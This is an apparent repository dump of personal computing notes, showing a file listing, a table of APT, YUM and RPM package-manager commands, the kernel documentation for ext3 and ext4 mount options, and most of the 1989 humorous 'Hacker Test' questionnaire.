├── MallocMaleficarum.txt
├── Malloc_Des-Maleficarum.txt
├── Packaging.txt
├── Users.txt
├── Vudo_malloc_tricks.txt
├── ext3.txt
├── ext4.txt
├── hacktest.text
├── heaptut.txt
├── memory.txt
├── memorylayout.txt
├── memorymanagement.txt
├── ntfs.txt
├── ret2libc.txt
└── unaligned-memory.txt
/Malloc_Des-Maleficarum.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Malformation/Notes/73e7b03526bb37f5b484c0bc6cd03caab8d1eb20/Malloc_Des-Maleficarum.txt
--------------------------------------------------------------------------------
/Packaging.txt:
--------------------------------------------------------------------------------
Task | APT | YUM | RPM
Meaning | Advanced Package Tool | Yellow dog (Linux) Updater, Modified | Red Hat Package Manager
File Extension | *.deb | *.rpm | *.rpm
(Remote) Repository location config | /etc/apt/sources.list | /etc/yum.conf | N/A
Update package index or header files from remote sources | aptitude update (apt-list update) | N/A (yum does this every time it's run; use -C to avoid this slow behavior) | N/A
Install new packages | aptitude install [args] | yum install [args] | rpm -Uvh [args]
Remove packages | aptitude remove [args] | yum remove [args] | rpm -e [args]
Find packages that you can install | apt-cache search [args] | yum search [args] | N/A
Show information about a package that is not installed [1] | apt-cache show [args] | yum list [args] | rpm -qip [args]
Show information about an installed package | apt-cache show [args] | yum info [args] | rpm -qi [args]
List the contents (files) of a package that is not installed [1] | dpkg -L [args] (apt-file show [args]) | | rpm -qlp [args]
List the contents (files) of an installed package | dpkg -L [args] (apt-file show [args]) | | rpm -ql [args]
Check for upgrades | aptitude -s upgrade (apt-get -s dist-upgrade) | yum check-update | N/A
Upgrade packages | aptitude dist-upgrade | yum update | rpm -Uvh [args]
Upgrade entire system | aptitude dist-upgrade | yum upgrade | N/A
Show the package to which a file belongs | dpkg-query -S (apt-file search) | yum provides / yum whatprovides | rpm -q --whatprovides
Remove packages from the local cache directory | aptitude clean | yum clean packages | N/A
Remove only obsolete packages from the local cache directory | aptitude autoclean | N/A | N/A
Remove header files from the local cache directory, forcing a new download of same on next use | apt-file purge | yum clean headers | N/A
Remove obsolete header files from the local cache directory | N/A | yum clean oldheaders | N/A
Run yum clean packages and yum clean oldheaders | N/A | yum clean all | N/A
Show stats about the package cache | apt-cache stats | |
Show the packages a given package depends on | apt-cache depends | |
Show other packages that depend on a given package (reverse dependency) | apt-cache rdepends | | rpm -q --whatrequires [args]
Show information about the packages | apt-cache showpkg [args] | |
Show the names, version and other information for all installed packages | dpkg -l | | rpm -qa
Verify all installed packages | debsums | | rpm -Va
Show what has been changed in a new version of a package | apt-listchanges | | rpm -q --changelog [args]
List available package versions with distribution | apt-show-versions | |
Query the package database | dpkg-query | | rpm -q
Show the list of all the packages in the cache | apt-cache pkgnames | |
--------------------------------------------------------------------------------
/ext3.txt:
-------------------------------------------------------------------------------- 1 | 2 | Ext3 Filesystem 3 | =============== 4 | 5 | Ext3 was originally released in September 1999. Written by Stephen Tweedie 6 | for the 2.2 branch, and ported to 2.4 kernels by Peter Braam, Andreas Dilger, 7 | Andrew Morton, Alexander Viro, Ted Ts'o and Stephen Tweedie. 8 | 9 | Ext3 is the ext2 filesystem enhanced with journalling capabilities. 10 | 11 | Options 12 | ======= 13 | 14 | When mounting an ext3 filesystem, the following option are accepted: 15 | (*) == default 16 | 17 | journal=update Update the ext3 file system's journal to the current 18 | format. 19 | 20 | journal=inum When a journal already exists, this option is ignored. 21 | Otherwise, it specifies the number of the inode which 22 | will represent the ext3 file system's journal file. 23 | 24 | journal_dev=devnum When the external journal device's major/minor numbers 25 | have changed, this option allows the user to specify 26 | the new journal location. The journal device is 27 | identified through its new major/minor numbers encoded 28 | in devnum. 29 | 30 | noload Don't load the journal on mounting. 31 | 32 | data=journal All data are committed into the journal prior to being 33 | written into the main file system. 34 | 35 | data=ordered (*) All data are forced directly out to the main file 36 | system prior to its metadata being committed to the 37 | journal. 38 | 39 | data=writeback Data ordering is not preserved, data may be written 40 | into the main file system after its metadata has been 41 | committed to the journal. 42 | 43 | commit=nrsec (*) Ext3 can be told to sync all its data and metadata 44 | every 'nrsec' seconds. The default value is 5 seconds. 45 | This means that if you lose your power, you will lose 46 | as much as the latest 5 seconds of work (your 47 | filesystem will not be damaged though, thanks to the 48 | journaling). This default value (or any low value) 49 | will hurt performance, but it's good for data-safety. 50 | Setting it to 0 will have the same effect as leaving 51 | it at the default (5 seconds). 52 | Setting it to very large values will improve 53 | performance. 54 | 55 | barrier=1 This enables/disables barriers. barrier=0 disables 56 | it, barrier=1 enables it. 57 | 58 | orlov (*) This enables the new Orlov block allocator. It is 59 | enabled by default. 60 | 61 | oldalloc This disables the Orlov block allocator and enables 62 | the old block allocator. Orlov should have better 63 | performance - we'd like to get some feedback if it's 64 | the contrary for you. 65 | 66 | user_xattr Enables Extended User Attributes. Additionally, you 67 | need to have extended attribute support enabled in the 68 | kernel configuration (CONFIG_EXT3_FS_XATTR). See the 69 | attr(5) manual page and http://acl.bestbits.at/ to 70 | learn more about extended attributes. 71 | 72 | nouser_xattr Disables Extended User Attributes. 73 | 74 | acl Enables POSIX Access Control Lists support. 75 | Additionally, you need to have ACL support enabled in 76 | the kernel configuration (CONFIG_EXT3_FS_POSIX_ACL). 77 | See the acl(5) manual page and http://acl.bestbits.at/ 78 | for more information. 79 | 80 | noacl This option disables POSIX Access Control List 81 | support. 82 | 83 | reservation 84 | 85 | noreservation 86 | 87 | bsddf (*) Make 'df' act like BSD. 88 | minixdf Make 'df' act like Minix. 89 | 90 | check=none Don't do extra checking of bitmaps on mount. 91 | nocheck 92 | 93 | debug Extra debugging information is sent to syslog. 
94 | 95 | errors=remount-ro(*) Remount the filesystem read-only on an error. 96 | errors=continue Keep going on a filesystem error. 97 | errors=panic Panic and halt the machine if an error occurs. 98 | 99 | grpid Give objects the same group ID as their creator. 100 | bsdgroups 101 | 102 | nogrpid (*) New objects have the group ID of their creator. 103 | sysvgroups 104 | 105 | resgid=n The group ID which may use the reserved blocks. 106 | 107 | resuid=n The user ID which may use the reserved blocks. 108 | 109 | sb=n Use alternate superblock at this location. 110 | 111 | quota 112 | noquota 113 | grpquota 114 | usrquota 115 | 116 | bh (*) ext3 associates buffer heads to data pages to 117 | nobh (a) cache disk block mapping information 118 | (b) link pages into transaction to provide 119 | ordering guarantees. 120 | "bh" option forces use of buffer heads. 121 | "nobh" option tries to avoid associating buffer 122 | heads (supported only for "writeback" mode). 123 | 124 | 125 | Specification 126 | ============= 127 | Ext3 shares all disk implementation with the ext2 filesystem, and adds 128 | transactions capabilities to ext2. Journaling is done by the Journaling Block 129 | Device layer. 130 | 131 | Journaling Block Device layer 132 | ----------------------------- 133 | The Journaling Block Device layer (JBD) isn't ext3 specific. It was designed 134 | to add journaling capabilities to a block device. The ext3 filesystem code 135 | will inform the JBD of modifications it is performing (called a transaction). 136 | The journal supports the transactions start and stop, and in case of a crash, 137 | the journal can replay the transactions to quickly put the partition back into 138 | a consistent state. 139 | 140 | Handles represent a single atomic update to a filesystem. JBD can handle an 141 | external journal on a block device. 142 | 143 | Data Mode 144 | --------- 145 | There are 3 different data modes: 146 | 147 | * writeback mode 148 | In data=writeback mode, ext3 does not journal data at all. This mode provides 149 | a similar level of journaling as that of XFS, JFS, and ReiserFS in its default 150 | mode - metadata journaling. A crash+recovery can cause incorrect data to 151 | appear in files which were written shortly before the crash. This mode will 152 | typically provide the best ext3 performance. 153 | 154 | * ordered mode 155 | In data=ordered mode, ext3 only officially journals metadata, but it logically 156 | groups metadata and data blocks into a single unit called a transaction. When 157 | it's time to write the new metadata out to disk, the associated data blocks 158 | are written first. In general, this mode performs slightly slower than 159 | writeback but significantly faster than journal mode. 160 | 161 | * journal mode 162 | data=journal mode provides full data and metadata journaling. All new data is 163 | written to the journal first, and then to its final location. 164 | In the event of a crash, the journal can be replayed, bringing both data and 165 | metadata into a consistent state. This mode is the slowest except when data 166 | needs to be read from and written to disk at the same time where it 167 | outperforms all other modes. 168 | 169 | Compatibility 170 | ------------- 171 | 172 | Ext2 partitions can be easily convert to ext3, with `tune2fs -j `. 173 | Ext3 is fully compatible with Ext2. Ext3 partitions can easily be mounted as 174 | Ext2. 175 | 176 | 177 | External Tools 178 | ============== 179 | See manual pages to learn more. 
tune2fs:    create an ext3 journal on an ext2 partition with the -j flag.
mke2fs:     create an ext3 partition with the -j flag.
debugfs:    ext2 and ext3 file system debugger.
ext2online: online (mounted) ext2 and ext3 filesystem resizer


References
==========

kernel source:

programs:       http://e2fsprogs.sourceforge.net/
                http://ext2resize.sourceforge.net

useful links:   http://www.zip.com.au/~akpm/linux/ext3/ext3-usage.html
                http://www-106.ibm.com/developerworks/linux/library/l-fs7/
                http://www-106.ibm.com/developerworks/linux/library/l-fs8/
--------------------------------------------------------------------------------
/ext4.txt:
--------------------------------------------------------------------------------
Ext4 Filesystem
===============

Ext4 is an advanced level of the ext3 filesystem which incorporates
scalability and reliability enhancements for supporting large filesystems
(64 bit) in keeping with increasing disk capacities and state-of-the-art
feature requirements.

Mailing list: linux-ext4[AT]vger.kernel[DOT]org
Web site:     http://ext4.wiki.kernel.org


1. Quick usage instructions:
============================

Note: More extensive information for getting started with ext4 can be
found at the ext4 wiki site at the URL:
http://ext4.wiki.kernel.org/index.php/Ext4_Howto

  - Compile and install the latest version of e2fsprogs (as of this
    writing version 1.41.3) from:

        http://sourceforge.net/project/showfiles.php?group_id=2406

    or

        ftp://ftp.kernel.org/pub/linux/kernel/people/tytso/e2fsprogs/

    or grab the latest git repository from:

        git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git

  - Note that it is highly important to install the mke2fs.conf file
    that comes with the e2fsprogs 1.41.x sources in /etc/mke2fs.conf. If
    you have edited the /etc/mke2fs.conf file installed on your system,
    you will need to merge your changes with the version from e2fsprogs
    1.41.x.

  - Create a new filesystem using the ext4 filesystem type:

        # mke2fs -t ext4 /dev/hda1

    Or to configure an existing ext3 filesystem to support extents:

        # tune2fs -O extents /dev/hda1

    If the filesystem was created with 128 byte inodes, it can be
    converted to use 256-byte inodes for greater efficiency via:

        # tune2fs -I 256 /dev/hda1

    (Note: we currently do not have tools to convert an ext4
    filesystem back to ext3; so please do not try this on production
    filesystems.)

  - Mounting:

        # mount -t ext4 /dev/hda1 /wherever

  - When comparing performance with other filesystems, it's always
    important to try multiple workloads; very often a subtle change in a
    workload parameter can completely change the ranking of which
    filesystems do well compared to others. When comparing versus ext3,
    note that ext4 enables write barriers by default, while ext3 does
    not enable write barriers by default. So it is useful to explicitly
    specify whether barriers are enabled via the '-o barriers=[0|1]'
    mount option for both ext3 and ext4 filesystems, for a fair comparison.
When tuning ext3 for best benchmark numbers, 69 | it is often worthwhile to try changing the data journaling mode; '-o 70 | data=writeback,nobh' can be faster for some workloads. (Note 71 | however that running mounted with data=writeback can potentially 72 | leave stale data exposed in recently written files in case of an 73 | unclean shutdown, which could be a security exposure in some 74 | situations.) Configuring the filesystem with a large journal can 75 | also be helpful for metadata-intensive workloads. 76 | 77 | 2. Features 78 | =========== 79 | 80 | 2.1 Currently available 81 | 82 | * ability to use filesystems > 16TB (e2fsprogs support not available yet) 83 | * extent format reduces metadata overhead (RAM, IO for access, transactions) 84 | * extent format more robust in face of on-disk corruption due to magics, 85 | * internal redundancy in tree 86 | * improved file allocation (multi-block alloc) 87 | * lift 32000 subdirectory limit imposed by i_links_count[1] 88 | * nsec timestamps for mtime, atime, ctime, create time 89 | * inode version field on disk (NFSv4, Lustre) 90 | * reduced e2fsck time via uninit_bg feature 91 | * journal checksumming for robustness, performance 92 | * persistent file preallocation (e.g for streaming media, databases) 93 | * ability to pack bitmaps and inode tables into larger virtual groups via the 94 | flex_bg feature 95 | * large file support 96 | * Inode allocation using large virtual block groups via flex_bg 97 | * delayed allocation 98 | * large block (up to pagesize) support 99 | * efficent new ordered mode in JBD2 and ext4(avoid using buffer head to force 100 | the ordering) 101 | 102 | [1] Filesystems with a block size of 1k may see a limit imposed by the 103 | directory hash tree having a maximum depth of two. 104 | 105 | 2.2 Candidate features for future inclusion 106 | 107 | * Online defrag (patches available but not well tested) 108 | * reduced mke2fs time via lazy itable initialization in conjuction with 109 | the uninit_bg feature (capability to do this is available in e2fsprogs 110 | but a kernel thread to do lazy zeroing of unused inode table blocks 111 | after filesystem is first mounted is required for safety) 112 | 113 | There are several others under discussion, whether they all make it in is 114 | partly a function of how much time everyone has to work on them. Features like 115 | metadata checksumming have been discussed and planned for a bit but no patches 116 | exist yet so I'm not sure they're in the near-term roadmap. 117 | 118 | The big performance win will come with mballoc, delalloc and flex_bg 119 | grouping of bitmaps and inode tables. Some test results available here: 120 | 121 | - http://www.bullopensource.org/ext4/20080818-ffsb/ffsb-write-2.6.27-rc1.html 122 | - http://www.bullopensource.org/ext4/20080818-ffsb/ffsb-readwrite-2.6.27-rc1.html 123 | 124 | 3. Options 125 | ========== 126 | 127 | When mounting an ext4 filesystem, the following option are accepted: 128 | (*) == default 129 | 130 | ro Mount filesystem read only. Note that ext4 will 131 | replay the journal (and thus write to the 132 | partition) even when mounted "read only". The 133 | mount options "ro,noload" can be used to prevent 134 | writes to the filesystem. 135 | 136 | journal_checksum Enable checksumming of the journal transactions. 137 | This will allow the recovery code in e2fsck and the 138 | kernel to detect corruption in the kernel. It is a 139 | compatible change and will be ignored by older kernels. 
140 | 141 | journal_async_commit Commit block can be written to disk without waiting 142 | for descriptor blocks. If enabled older kernels cannot 143 | mount the device. This will enable 'journal_checksum' 144 | internally. 145 | 146 | journal=update Update the ext4 file system's journal to the current 147 | format. 148 | 149 | journal_dev=devnum When the external journal device's major/minor numbers 150 | have changed, this option allows the user to specify 151 | the new journal location. The journal device is 152 | identified through its new major/minor numbers encoded 153 | in devnum. 154 | 155 | norecovery Don't load the journal on mounting. Note that 156 | noload if the filesystem was not unmounted cleanly, 157 | skipping the journal replay will lead to the 158 | filesystem containing inconsistencies that can 159 | lead to any number of problems. 160 | 161 | data=journal All data are committed into the journal prior to being 162 | written into the main file system. 163 | 164 | data=ordered (*) All data are forced directly out to the main file 165 | system prior to its metadata being committed to the 166 | journal. 167 | 168 | data=writeback Data ordering is not preserved, data may be written 169 | into the main file system after its metadata has been 170 | committed to the journal. 171 | 172 | commit=nrsec (*) Ext4 can be told to sync all its data and metadata 173 | every 'nrsec' seconds. The default value is 5 seconds. 174 | This means that if you lose your power, you will lose 175 | as much as the latest 5 seconds of work (your 176 | filesystem will not be damaged though, thanks to the 177 | journaling). This default value (or any low value) 178 | will hurt performance, but it's good for data-safety. 179 | Setting it to 0 will have the same effect as leaving 180 | it at the default (5 seconds). 181 | Setting it to very large values will improve 182 | performance. 183 | 184 | barrier=<0|1(*)> This enables/disables the use of write barriers in 185 | barrier(*) the jbd code. barrier=0 disables, barrier=1 enables. 186 | nobarrier This also requires an IO stack which can support 187 | barriers, and if jbd gets an error on a barrier 188 | write, it will disable again with a warning. 189 | Write barriers enforce proper on-disk ordering 190 | of journal commits, making volatile disk write caches 191 | safe to use, at some performance penalty. If 192 | your disks are battery-backed in one way or another, 193 | disabling barriers may safely improve performance. 194 | The mount options "barrier" and "nobarrier" can 195 | also be used to enable or disable barriers, for 196 | consistency with other ext4 mount options. 197 | 198 | inode_readahead_blks=n This tuning parameter controls the maximum 199 | number of inode table blocks that ext4's inode 200 | table readahead algorithm will pre-read into 201 | the buffer cache. The default value is 32 blocks. 202 | 203 | orlov (*) This enables the new Orlov block allocator. It is 204 | enabled by default. 205 | 206 | oldalloc This disables the Orlov block allocator and enables 207 | the old block allocator. Orlov should have better 208 | performance - we'd like to get some feedback if it's 209 | the contrary for you. 210 | 211 | user_xattr Enables Extended User Attributes. Additionally, you 212 | need to have extended attribute support enabled in the 213 | kernel configuration (CONFIG_EXT4_FS_XATTR). See the 214 | attr(5) manual page and http://acl.bestbits.at/ to 215 | learn more about extended attributes. 
216 | 217 | nouser_xattr Disables Extended User Attributes. 218 | 219 | acl Enables POSIX Access Control Lists support. 220 | Additionally, you need to have ACL support enabled in 221 | the kernel configuration (CONFIG_EXT4_FS_POSIX_ACL). 222 | See the acl(5) manual page and http://acl.bestbits.at/ 223 | for more information. 224 | 225 | noacl This option disables POSIX Access Control List 226 | support. 227 | 228 | reservation 229 | 230 | noreservation 231 | 232 | bsddf (*) Make 'df' act like BSD. 233 | minixdf Make 'df' act like Minix. 234 | 235 | debug Extra debugging information is sent to syslog. 236 | 237 | abort Simulate the effects of calling ext4_abort() for 238 | debugging purposes. This is normally used while 239 | remounting a filesystem which is already mounted. 240 | 241 | errors=remount-ro Remount the filesystem read-only on an error. 242 | errors=continue Keep going on a filesystem error. 243 | errors=panic Panic and halt the machine if an error occurs. 244 | (These mount options override the errors behavior 245 | specified in the superblock, which can be configured 246 | using tune2fs) 247 | 248 | data_err=ignore(*) Just print an error message if an error occurs 249 | in a file data buffer in ordered mode. 250 | data_err=abort Abort the journal if an error occurs in a file 251 | data buffer in ordered mode. 252 | 253 | grpid Give objects the same group ID as their creator. 254 | bsdgroups 255 | 256 | nogrpid (*) New objects have the group ID of their creator. 257 | sysvgroups 258 | 259 | resgid=n The group ID which may use the reserved blocks. 260 | 261 | resuid=n The user ID which may use the reserved blocks. 262 | 263 | sb=n Use alternate superblock at this location. 264 | 265 | quota These options are ignored by the filesystem. They 266 | noquota are used only by quota tools to recognize volumes 267 | grpquota where quota should be turned on. See documentation 268 | usrquota in the quota-tools package for more details 269 | (http://sourceforge.net/projects/linuxquota). 270 | 271 | jqfmt= These options tell filesystem details about quota 272 | usrjquota= so that quota information can be properly updated 273 | grpjquota= during journal replay. They replace the above 274 | quota options. See documentation in the quota-tools 275 | package for more details 276 | (http://sourceforge.net/projects/linuxquota). 277 | 278 | bh (*) ext4 associates buffer heads to data pages to 279 | nobh (a) cache disk block mapping information 280 | (b) link pages into transaction to provide 281 | ordering guarantees. 282 | "bh" option forces use of buffer heads. 283 | "nobh" option tries to avoid associating buffer 284 | heads (supported only for "writeback" mode). 285 | 286 | stripe=n Number of filesystem blocks that mballoc will try 287 | to use for allocation size and alignment. For RAID5/6 288 | systems this should be the number of data 289 | disks * RAID chunk size in file system blocks. 290 | 291 | delalloc (*) Defer block allocation until just before ext4 292 | writes out the block(s) in question. This 293 | allows ext4 to better allocation decisions 294 | more efficiently. 295 | nodelalloc Disable delayed allocation. Blocks are allocated 296 | when the data is copied from userspace to the 297 | page cache, either via the write(2) system call 298 | or when an mmap'ed page which was previously 299 | unallocated is written for the first time. 
300 | 301 | max_batch_time=usec Maximum amount of time ext4 should wait for 302 | additional filesystem operations to be batch 303 | together with a synchronous write operation. 304 | Since a synchronous write operation is going to 305 | force a commit and then a wait for the I/O 306 | complete, it doesn't cost much, and can be a 307 | huge throughput win, we wait for a small amount 308 | of time to see if any other transactions can 309 | piggyback on the synchronous write. The 310 | algorithm used is designed to automatically tune 311 | for the speed of the disk, by measuring the 312 | amount of time (on average) that it takes to 313 | finish committing a transaction. Call this time 314 | the "commit time". If the time that the 315 | transaction has been running is less than the 316 | commit time, ext4 will try sleeping for the 317 | commit time to see if other operations will join 318 | the transaction. The commit time is capped by 319 | the max_batch_time, which defaults to 15000us 320 | (15ms). This optimization can be turned off 321 | entirely by setting max_batch_time to 0. 322 | 323 | min_batch_time=usec This parameter sets the commit time (as 324 | described above) to be at least min_batch_time. 325 | It defaults to zero microseconds. Increasing 326 | this parameter may improve the throughput of 327 | multi-threaded, synchronous workloads on very 328 | fast disks, at the cost of increasing latency. 329 | 330 | journal_ioprio=prio The I/O priority (from 0 to 7, where 0 is the 331 | highest priorty) which should be used for I/O 332 | operations submitted by kjournald2 during a 333 | commit operation. This defaults to 3, which is 334 | a slightly higher priority than the default I/O 335 | priority. 336 | 337 | auto_da_alloc(*) Many broken applications don't use fsync() when 338 | noauto_da_alloc replacing existing files via patterns such as 339 | fd = open("foo.new")/write(fd,..)/close(fd)/ 340 | rename("foo.new", "foo"), or worse yet, 341 | fd = open("foo", O_TRUNC)/write(fd,..)/close(fd). 342 | If auto_da_alloc is enabled, ext4 will detect 343 | the replace-via-rename and replace-via-truncate 344 | patterns and force that any delayed allocation 345 | blocks are allocated such that at the next 346 | journal commit, in the default data=ordered 347 | mode, the data blocks of the new file are forced 348 | to disk before the rename() operation is 349 | committed. This provides roughly the same level 350 | of guarantees as ext3, and avoids the 351 | "zero-length" problem that can happen when a 352 | system crashes before the delayed allocation 353 | blocks are forced to disk. 354 | 355 | discard Controls whether ext4 should issue discard/TRIM 356 | nodiscard(*) commands to the underlying block device when 357 | blocks are freed. This is useful for SSD devices 358 | and sparse/thinly-provisioned LUNs, but it is off 359 | by default until sufficient testing has been done. 360 | 361 | Data Mode 362 | ========= 363 | There are 3 different data modes: 364 | 365 | * writeback mode 366 | In data=writeback mode, ext4 does not journal data at all. This mode provides 367 | a similar level of journaling as that of XFS, JFS, and ReiserFS in its default 368 | mode - metadata journaling. A crash+recovery can cause incorrect data to 369 | appear in files which were written shortly before the crash. This mode will 370 | typically provide the best ext4 performance. 
371 | 372 | * ordered mode 373 | In data=ordered mode, ext4 only officially journals metadata, but it logically 374 | groups metadata information related to data changes with the data blocks into a 375 | single unit called a transaction. When it's time to write the new metadata 376 | out to disk, the associated data blocks are written first. In general, 377 | this mode performs slightly slower than writeback but significantly faster than journal mode. 378 | 379 | * journal mode 380 | data=journal mode provides full data and metadata journaling. All new data is 381 | written to the journal first, and then to its final location. 382 | In the event of a crash, the journal can be replayed, bringing both data and 383 | metadata into a consistent state. This mode is the slowest except when data 384 | needs to be read from and written to disk at the same time where it 385 | outperforms all others modes. Currently ext4 does not have delayed 386 | allocation support if this data journalling mode is selected. 387 | 388 | References 389 | ========== 390 | 391 | kernel source: 392 | 393 | 394 | programs: http://e2fsprogs.sourceforge.net/ 395 | 396 | useful links: http://fedoraproject.org/wiki/ext3-devel 397 | http://www.bullopensource.org/ext4/ 398 | http://ext4.wiki.kernel.org/index.php/Main_Page 399 | http://fedoraproject.org/wiki/Features/Ext4 400 | 401 | 402 | -------------------------------------------------------------------------------- /hacktest.text: -------------------------------------------------------------------------------- 1 | From AMFPN@NEUVM1.BITNET Tue Oct 31 20:46:54 1989 2 | From: Per Nielsen 3 | Subject: Hacker test (was: Forwarded mail for FREETALK) 4 | 5 | 6 | 7 | 1 8 | 9 | 10 | THE HACKER TEST - Version 1.0 11 | 12 | 13 | Preface: 06.16.89 14 | 15 | This test was conceived and written by Felix Lee, John Hayes and Angela 16 | Thomas at the end of the spring semester, 1989. It has gone through 17 | many revisions prior to this initial release, and will undoubtedly go 18 | through many more. 19 | 20 | 21 | (Herewith a compendium of fact and folklore about computer hackerdom, 22 | cunningly disguised as a test.) 23 | 24 | 25 | Scoring - Count 1 for each item that you have done, or each 26 | question that you can answer correctly. 27 | 28 | 29 | If you score is between: You are 30 | 31 | 0x000 and 0x010 -> Computer Illiterate 32 | 0x011 and 0x040 -> a User 33 | 0x041 and 0x080 -> an Operator 34 | 0x081 and 0x0C0 -> a Nerd 35 | 0x0C1 and 0x100 -> a Hacker 36 | 0x101 and 0x180 -> a Guru 37 | 0x181 and 0x200 -> a Wizard 38 | 39 | Note: If you don't understand the scoring, stop here. 40 | 41 | 42 | And now for the questions... 43 | 44 | 45 | 0001 Have you ever used a computer? 46 | 0002 ... for more than 4 hours continuously? 47 | 0003 ... more than 8 hours? 48 | 0004 ... more than 16 hours? 49 | 0005 ... more than 32 hours? 50 | 51 | 0006 Have you ever patched paper tape? 52 | 53 | 0007 Have you ever missed a class while programming? 54 | 0008 ... Missed an examination? 55 | 0009 ... Missed a wedding? 56 | 0010 ... Missed your own wedding? 57 | 58 | 0011 Have you ever programmed while intoxicated? 59 | 0012 ... Did it make sense the next day? 60 | 61 | 0013 Have you ever written a flight simulator? 62 | 63 | 0014 Have you ever voided the warranty on your equipment? 64 | 65 | 0015 Ever change the value of 4? 66 | 0016 ... Unintentionally? 67 | 0017 ... In a language other than Fortran? 68 | 69 | 0018 Do you use DWIM to make life interesting? 70 | 71 | 0019 Have you named a computer? 
72 | 73 | 0020 Do you complain when a "feature" you use gets fixed? 74 | 75 | 0021 Do you eat slime-molds? 76 | 77 | 0022 Do you know how many days old you are? 78 | 79 | 0023 Have you ever wanted to download pizza? 80 | 81 | 0024 Have you ever invented a computer joke? 82 | 0025 ... Did someone not 'get' it? 83 | 84 | 0026 Can you recite Jabberwocky? 85 | 0027 ... Backwards? 86 | 87 | 0028 Have you seen "Donald Duck in Mathemagic Land"? 88 | 89 | 0029 Have you seen "Tron"? 90 | 91 | 0030 Have you seen "Wargames"? 92 | 93 | 0031 Do you know what ASCII stands for? 94 | 0032 ... EBCDIC? 95 | 96 | 0033 Can you read and write ASCII in hex or octal? 97 | 0034 Do you know the names of all the ASCII control codes? 98 | 99 | 0035 Can you read and write EBCDIC in hex? 100 | 101 | 0036 Can you convert from EBCDIC to ASCII and vice versa? 102 | 103 | 0037 Do you know what characters are the same in both ASCII and EBCDIC? 104 | 105 | 0038 Do you know maxint on your system? 106 | 107 | 0039 Ever define your own numerical type to get better precision? 108 | 109 | 0040 Can you name powers of two up to 2**16 in arbitrary order? 110 | 0041 ... up to 2**32? 111 | 0042 ... up to 2**64? 112 | 113 | 0043 Can you read a punched card, looking at the holes? 114 | 0044 ... feeling the holes? 115 | 116 | 0045 Have you ever patched binary code? 117 | 0046 ... While the program was running? 118 | 119 | 0047 Have you ever used program overlays? 120 | 121 | 0048 Have you met any IBM vice-president? 122 | 0049 Do you know Dennis, Bill, or Ken? 123 | 124 | 0050 Have you ever taken a picture of a CRT? 125 | 0051 Have you ever played a videotape on your CRT? 126 | 127 | 0052 Have you ever digitized a picture? 128 | 129 | 0053 Did you ever forget to mount a scratch monkey? 130 | 131 | 0054 Have you ever optimized an idle loop? 132 | 133 | 0055 Did you ever optimize a bubble sort? 134 | 135 | 0056 Does your terminal/computer talk to you? 136 | 137 | 0057 Have you ever talked into an acoustic modem? 138 | 0058 ... Did it answer? 139 | 140 | 0059 Can you whistle 300 baud? 141 | 0060 ... 1200 baud? 142 | 143 | 0061 Can you whistle a telephone number? 144 | 145 | 0062 Have you witnessed a disk crash? 146 | 0063 Have you made a disk drive "walk"? 147 | 148 | 0064 Can you build a puffer train? 149 | 0065 ... Do you know what it is? 150 | 151 | 0066 Can you play music on your line printer? 152 | 0067 ... Your disk drive? 153 | 0068 ... Your tape drive? 154 | 155 | 0069 Do you have a Snoopy calendar? 156 | 0070 ... Is it out-of-date? 157 | 158 | 0071 Do you have a line printer picture of... 159 | 0072 ... the Mona Lisa? 160 | 0073 ... the Enterprise? 161 | 0074 ... Einstein? 162 | 0075 ... Oliver? 163 | 0076 Have you ever made a line printer picture? 164 | 165 | 0077 Do you know what the following stand for? 166 | 0078 ... DASD 167 | 0079 ... Emacs 168 | 0080 ... ITS 169 | 0081 ... RSTS/E 170 | 0082 ... SNA 171 | 0083 ... Spool 172 | 0084 ... TCP/IP 173 | 174 | Have you ever used 175 | 0085 ... TPU? 176 | 0086 ... TECO? 177 | 0087 ... Emacs? 178 | 0088 ... ed? 179 | 0089 ... vi? 180 | 0090 ... Xedit (in VM/CMS)? 181 | 0091 ... SOS? 182 | 0092 ... EDT? 183 | 0093 ... Wordstar? 184 | 185 | 0094 Have you ever written a CLIST? 186 | 187 | Have you ever programmed in 188 | 0095 ... the X windowing system? 189 | 0096 ... CICS? 190 | 191 | 0097 Have you ever received a Fax or a photocopy of a floppy? 192 | 193 | 0098 Have you ever shown a novice the "any" key? 194 | 0099 ... Was it the power switch? 
195 | 196 | Have you ever attended 197 | 0100 ... Usenix? 198 | 0101 ... DECUS? 199 | 0102 ... SHARE? 200 | 0103 ... SIGGRAPH? 201 | 0104 ... NetCon? 202 | 203 | 0105 Have you ever participated in a standards group? 204 | 205 | 0106 Have you ever debugged machine code over the telephone? 206 | 207 | 0107 Have you ever seen voice mail? 208 | 0108 ... Can you read it? 209 | 210 | 0109 Do you solve word puzzles with an on-line dictionary? 211 | 212 | 0110 Have you ever taken a Turing test? 213 | 0111 ... Did you fail? 214 | 215 | 0112 Ever drop a card deck? 216 | 0113 ... Did you successfully put it back together? 217 | 0114 ... Without looking? 218 | 219 | 0115 Have you ever used IPCS? 220 | 221 | 0116 Have you ever received a case of beer with your computer? 222 | 223 | 0117 Does your computer come in 'designer' colors? 224 | 225 | 0118 Ever interrupted a UPS? 226 | 227 | 0119 Ever mask an NMI? 228 | 229 | 0120 Have you ever set off a Halon system? 230 | 0121 ... Intentionally? 231 | 0122 ... Do you still work there? 232 | 233 | 0123 Have you ever hit the emergency power switch? 234 | 0124 ... Intentionally? 235 | 236 | 0125 Do you have any defunct documentation? 237 | 0126 ... Do you still read it? 238 | 239 | 0127 Ever reverse-engineer or decompile a program? 240 | 0128 ... Did you find bugs in it? 241 | 242 | 0129 Ever help the person behind the counter with their terminal/computer? 243 | 244 | 0130 Ever tried rack mounting your telephone? 245 | 246 | 0131 Ever thrown a computer from more than two stories high? 247 | 248 | 0132 Ever patched a bug the vendor does not acknowledge? 249 | 250 | 0133 Ever fix a hardware problem in software? 251 | 0134 ... Vice versa? 252 | 253 | 0135 Ever belong to a user/support group? 254 | 255 | 0136 Ever been mentioned in Computer Recreations? 256 | 257 | 0137 Ever had your activities mentioned in the newspaper? 258 | 0138 ... Did you get away with it? 259 | 260 | 0139 Ever engage a drum brake while the drum was spinning? 261 | 262 | 0140 Ever write comments in a non-native language? 263 | 264 | 0141 Ever physically destroy equipment from software? 265 | 266 | 0142 Ever tried to improve your score on the Hacker Test? 267 | 268 | 0143 Do you take listings with you to lunch? 269 | 0144 ... To bed? 270 | 271 | 0145 Ever patch a microcode bug? 272 | 0146 ... around a microcode bug? 273 | 274 | 0147 Can you program a Turing machine? 275 | 276 | 0148 Can you convert postfix to prefix in your head? 277 